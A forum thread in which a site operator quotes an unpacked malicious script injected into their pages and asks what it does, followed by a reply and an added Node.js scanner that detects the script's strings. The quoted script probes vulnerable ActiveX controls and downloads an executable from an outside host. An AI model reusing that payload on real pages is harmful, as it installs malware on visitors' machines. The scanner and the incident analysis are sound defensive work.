Hi, there's a malicious JS code getting injected into the pages in our network. It was packed (eval(packer function)) and after unpacking it to see its contents, I see that it creates a whole lot of ActiveXObjects. Anyone have any clue as to what this may be doing? What on earth is clsid:BD96C556-65A3-11D0-983A-00C04FC29E36?

    if (document.cookie.indexOf('OKSUN') == -1) {
        try {
            var e;
            var ado = (document.createElement("object"));
            ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
            var as = ado.createobject("Adodb.Stream", "")
        } catch(e){};
        finally {
            var expires = new Date();
            expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
            document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString();
            document.write("<\/script>");
            if(e != "[object Error]") {
                document.write("<\/script>")
            } else {
                try {
                    var f;
                    var storm = new ActiveXObject("MPS.StormPlayer")
                } catch(f){};
                finally {
                    if (f != "[object Error]") {
                        document.write("<\/script>");
                        document.write("")
                    }
                }
                try {
                    var g;
                    var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
                } catch(g){};
                finally {
                    if (g != "[object Error]") {
                        document.write("<\/script>");
                        document.write("")
                    }
                }
                try {
                    var h;
                    var thunder = new ActiveXObject("DPClient.Vod")
                } catch(h){};
                finally {
                    if (h != "[object Error]") {
                        document.write("<\/script>");
                        document.write("")
                    }
                }
                try {
                    var i;
                    var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
                } catch(i){};
                finally {
                    if (i != "[object Error]") {
                        document.write("")
                    }
                }
                try {
                    var j;
                    var obj = new ActiveXObject("BaiduBar.Tool")
                } catch(j){};
                finally {
                    if (j != "[object Error]") {
                        obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
                        document.write("")
                    }
                }
                if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]") {
                    document.write("")
                }
            }
        }
    }

Looks like it's attempting to create an instance of a video player, Baidu Search toolbar, or download an installer. Either to artificially inflate some numbers somewhere, or install some nastyware. That code itself is the least of your worries; how it got there is your primary concern.
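
An added example, not part of either post or of the injected script: a Node.js static check that flags a served page body carrying the strings from the unpacked script above, whether they appear as written or broken into separate words, which is how a word-dictionary packer would store them (an assumption; the thread says only that the script was packed with eval). The names `scanBody` and `verdict`, the thresholds and the sample bodies are constructed for illustration.

```javascript
// Added example: static scan only; the scanned body is never executed.
// Indicator strings are copied from the unpacked script quoted in the thread.
const INDICATORS = [
  "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36",
  "Adodb.Stream", "MPS.StormPlayer", "POWERPLAYER.PowerPlayerCtrl.1",
  "DPClient.Vod", "GLCHAT.GLChatCtrl.1", "BaiduBar.Tool",
  "DloadDS", "OKSUN",
];

const words = (s) => s.toLowerCase().match(/\w+/g) || [];

// One finding per indicator present in `body`.
//   "literal": the string appears as written (unpacked script).
//   "split":   each word of it appears somewhere in the body, which is how a
//              word-dictionary packer would store it (assumed packer style).
function scanBody(body) {
  const lower = body.toLowerCase();
  const seen = new Set(words(body));
  const findings = [];
  for (const ind of INDICATORS) {
    if (lower.includes(ind.toLowerCase())) {
      findings.push({ indicator: ind, match: "literal" });
    } else if (words(ind).every((w) => seen.has(w))) {
      findings.push({ indicator: ind, match: "split" });
    }
  }
  return findings;
}

// Thresholds are illustrative: several indicators together, or fewer when the
// body also has an eval(function(...)) wrapper.
function verdict(body) {
  const findings = scanBody(body);
  const packed = /eval\s*\(\s*function\s*\(/.test(body);
  const suspicious = findings.length >= 3 || (packed && findings.length >= 2);
  return { packed, suspicious, findings };
}

// Constructed sample bodies (not captured traffic).
const UNPACKED_SAMPLE = `<script>if(document.cookie.indexOf('OKSUN')==-1){ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");new ActiveXObject("BaiduBar.Tool")}</script>`;
const PACKED_SAMPLE = `<script>eval(function(p,a,c,k,e,d){return p}('0 1=2 3("4.5")',6,6,'var|obj|new|ActiveXObject|BaiduBar|Tool|OKSUN|DloadDS'.split('|')))</script>`;
const CLEAN_SAMPLE = `<script>var tool = document.cookie;</script>`;

for (const [name, body] of [["unpacked", UNPACKED_SAMPLE], ["packed", PACKED_SAMPLE], ["clean", CLEAN_SAMPLE]]) {
  const v = verdict(body);
  console.log(name, v.suspicious, v.findings.map((f) => f.indicator + ":" + f.match).join(", "));
}
```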